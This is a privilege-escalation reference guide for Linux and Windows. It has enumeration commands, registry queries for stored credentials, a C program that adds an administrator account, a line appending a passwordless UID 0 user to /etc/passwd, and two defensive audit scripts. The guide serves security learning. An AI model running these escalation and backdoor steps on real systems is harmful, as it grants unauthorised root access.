Welcome to the Privilege Escalation Resources guide! This comprehensive compilation aims to provide you with essential information and tools to understand and address privilege escalation techniques on both Linux and Windows systems. Privilege escalation refers to the process of elevating user privileges to gain unauthorized access to sensitive resources or perform critical actions.
In this guide, we will explore various resources and methodologies to identify potential vulnerabilities and weaknesses in a system, allowing you to escalate privileges and gain deeper access. We will cover websites, tools, code snippets, and techniques commonly used by security professionals to assess and strengthen the security of their systems.
Whether you are a seasoned cybersecurity expert or a curious individual looking to learn more about security practices, this guide offers valuable insights and practical knowledge to enhance your understanding of privilege escalation. Let’s dive into the world of privilege escalation and arm ourselves with the knowledge needed to protect our systems effectively.
- GTFOBins – A collection of Unix binaries that can be used for privilege escalation. Website: https://gtfobins.github.io/
- Linux Privilege Escalation Fundamentals – Comprehensive guide on Linux privilege escalation. Website: https://guif.re/linuxeop
- Windows Privilege Escalation Fundamentals – Detailed resource for Windows privilege escalation. Website: https://guif.re/windowseop
- FuzzySecurity – Windows Privilege Escalation Fundamentals – In-depth tutorial on Windows privilege escalation. Website: http://www.fuzzysecurity.com/tutorials/16.html
- Payatu – Guide to Linux Privilege Escalation – A guide on Linux privilege escalation. Website: https://payatu.com/guide-linux-privilege-escalation
Linux Privilege Escalation Techniques
- Checking sudo privileges (sudo -l)
- Exploiting kernel vulnerabilities (Kernel Exploits)
- Leveraging vulnerabilities in the operating system (OS Exploits)
- Exploiting password reuse in various files (MySQL, .bash_history, 000-default.conf, etc.)
- Identifying binaries with the suid flag and interactive mode (e.g., nmap)
- Exploiting custom binaries with the suid flag, either through other binaries or command execution
- Exploiting writable files owned by root, executed through cron jobs
- Gaining MySQL access as root
- Exploiting vulnerable services like chkrootkit and logrotate
- Gaining access to sensitive files like /etc/passwd and .bash_history
- Obtaining SSH private keys and public keys with a predictable PRNG
- Monitoring listening ports on localhost for potential vulnerabilities
- Checking /etc/fstab, /etc/exports, and /var/mail for exploitable configurations
- Processes running as other users (root) that read or modify files you have write permission on
Windows Privilege Escalation Techniques
- Leveraging kernel exploits and OS vulnerabilities (Kernel Exploits, OS Exploits)
- Pass The Hash attack method
- Exploiting password reuse
- DLL hijacking through the PATH
- Exploiting vulnerable services and writable service binary paths
- Identifying unquoted service paths for exploitation
- Monitoring listening ports on localhost for potential vulnerabilities
- Investigating registry keys for exploitable configurations
Kernel Exploits Repositories
- Linux Kernel Exploits: https://github.com/lucyoa/kernel-exploits
- Windows Kernel Exploits: https://github.com/abatchy17/WindowsExploits
Windows Privilege Escalation Guides
- Windows Privilege Escalation Guide: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Sample Windows Code for User Addition:
#include <stdlib.h> /* system, EXIT_SUCCESS, EXIT_FAILURE */
#include <stdio.h>  /* perror */

int main(void) {
    /* Creates a local account and adds it to the Administrators group.
       Replace the <username> and <password> placeholders before building. */
    int status = system("net user <username> <password> /add && net localgroup administrators <username> /add");
    if (status == -1) {
        perror("system");
        return EXIT_FAILURE;
    }
    return status == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
Linux Privilege Escalation Techniques
- Finding binaries with the suid, sgid, or sticky bit set:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
- Finding writable files and directories:
find / -writable -type f 2>/dev/null
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
find /etc/ -writable -type f 2>/dev/null
- Identifying SUID binaries owned by root:
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
Windows Exploit Suggester:
python windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls
Windows Privilege Escalation Techniques
- Checking registry settings for AlwaysInstallElevated:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Basic Linux Enumeration
- Finding distribution type and kernel version:
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
- Checking default writable directories:
/tmp
/dev/shm
- Searching for passwords in files like config.php:
grep -R 'password' config.php
- Finding other writable directories and folders:
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
- Identifying services running as root user:
ps aux | grep root
ps -ef | grep root
- Listing installed applications and packages:
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives
ls -lah /var/cache/yum/
- Checking scheduled jobs:
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
- Searching for patterns in files:
grep -rnw '/etc/passwd' -e 'root'
Sticky Bit, SGID, SUID
- Sticky Bit:
find / -perm -1000 -type d 2>/dev/null
- SGID (chmod 2000):
find / -perm -g=s -type f 2>/dev/null
- SUID (chmod 4000):
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
- SUID or SGID (parentheses keep -type f applying to both branches):
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
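The set-id find one-liners above (and the earlier "Finding binaries with the suid, sgid, or sticky bit set" section) are one-shot listings; as an added example that is not part of the original article, the script below turns them into a baseline check that reports newly appeared SUID/SGID files. The directory tree and file names it scans are constructed for the demonstration; on a real host you would snapshot from `/`.

```shell
#!/bin/sh
# Added example: baseline-diff for SUID/SGID files.
# suid_snapshot lists set-id regular files under a directory, sorted so
# the two snapshots can be compared with comm(1).
suid_snapshot() {
    # $1: directory to scan (use / on a real host)
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# suid_new prints paths present in the current snapshot ($2) but missing
# from the saved baseline ($1): set-id files that appeared since the baseline.
suid_new() {
    comm -13 "$1" "$2"
}

# Constructed test tree standing in for a real filesystem (not real data).
ROOT=$(mktemp -d)
mkdir -p "$ROOT/bin" "$ROOT/tmp"
: > "$ROOT/bin/passwd"; chmod 4755 "$ROOT/bin/passwd"   # expected SUID binary
: > "$ROOT/bin/ls";     chmod 0755 "$ROOT/bin/ls"       # ordinary binary, ignored
suid_snapshot "$ROOT" > "$ROOT/baseline.txt"

# Later, a set-id file shows up in a world-writable location.
: > "$ROOT/tmp/newbin"; chmod 4755 "$ROOT/tmp/newbin"
suid_snapshot "$ROOT" > "$ROOT/current.txt"

# Report only what changed since the baseline.
suid_new "$ROOT/baseline.txt" "$ROOT/current.txt"
```

Keep the baseline file somewhere the audited host cannot modify; a diff that lists a set-id file under /tmp, /dev/shm or a home directory is worth investigating immediately.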
Adding a user to /etc/passwd and the root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
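The line above adds a passwordless UID 0 account; as an added example that is not from the original article, the audit below parses a passwd-format file and flags exactly that pattern: any non-root account with UID 0 or GID 0, and any account whose password field is empty. The sample passwd file is constructed for the demonstration; point the function at /etc/passwd on a real host.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for root-equivalent or
# passwordless entries. Output lines are "<finding>: <account>".
audit_passwd() {
    # $1: path to a passwd-format file
    awk -F: '
        NF < 7                  { printf "malformed: %s\n", $0; next }
        $1 != "root" && $3 == 0 { printf "uid0: %s\n", $1 }      # extra UID 0 account
        $1 != "root" && $4 == 0 { printf "gid0: %s\n", $1 }      # primary group root
        $2 == ""                { printf "nopass: %s\n", $1 }    # empty password field
    ' "$1"
}

# Constructed sample standing in for /etc/passwd (not real data).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hodor::0:0:root:/root:/bin/bash
EOF

audit_passwd "$SAMPLE"
```

A clean file produces no output, which makes the function easy to wire into a cron job or a host-integrity check alongside a hash of /etc/passwd and /etc/shadow.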